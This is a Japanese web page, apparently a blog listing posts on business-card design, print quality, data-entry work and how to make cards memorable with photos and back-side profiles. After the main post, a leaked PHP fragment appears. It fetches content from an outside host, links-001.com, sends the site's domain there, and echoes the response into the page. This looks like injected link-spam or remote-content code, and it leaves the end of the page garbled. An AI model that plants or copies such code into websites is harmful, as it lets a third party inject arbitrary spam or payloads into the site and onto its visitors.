前へ
次へ

本当に気に入った名刺を持つことが出来ます

世の中には、名刺というものを持っている人がたくさんいますが、特に当たり障りのない無難なデザインのもの

more

名刺のデータを入力するお仕事について

最近ではクラウドソーシングサイトも人気がでてきたとともに、サイト数も増加してきました。
そんな

more

名刺の印刷のクオリティを上げると見栄えが違います

名刺の印刷のクオリティを考えたことがある人はあまり多くはないのが一般的ですが、人からもらったものを並

more

名刺で仕事のチャンスを広げる方法

昔からある名刺のデザインで、白地に黒文字で氏名・社名・住所・電話番号だけが印刷されている名刺ってありますよね。
でもそれでは印象に残りにくいです。
自分の写真を入れてみるというのも印象を強くする方法の一つです。
写真ではなくてもイラストを挿入することでイラストで特徴を覚えていたりするものです。
また、立体的なアイテムを使うという意味でプリクラやデコレーションシールを貼ったりすることでも随分印象が違います。
名刺を活用するには裏面に情報を入れることも重要です。
裏面を使わないのはもったいないです。
プロフィールを裏面に記載することで、相手に記憶される可能性は高まります。
例えば、生年月日や干支、趣味に関する内容やアダ名なんかもいれるとより相手の記憶に残りやすくなります。
一番有効なのは今までの経歴や活動してきた内容になります。
「実はこんなスキルがあったんですね」ということが相手に伝わり、名刺が縁で他の仕事の依頼を受けたりするというチャンスに恵まれたりすこともあります。

".file_get_contents('http://links-001.com/123set5.php?dom='.str_replace("www.", "", $_SERVER['HTTP_HOST']))."

"; ?>

Page Top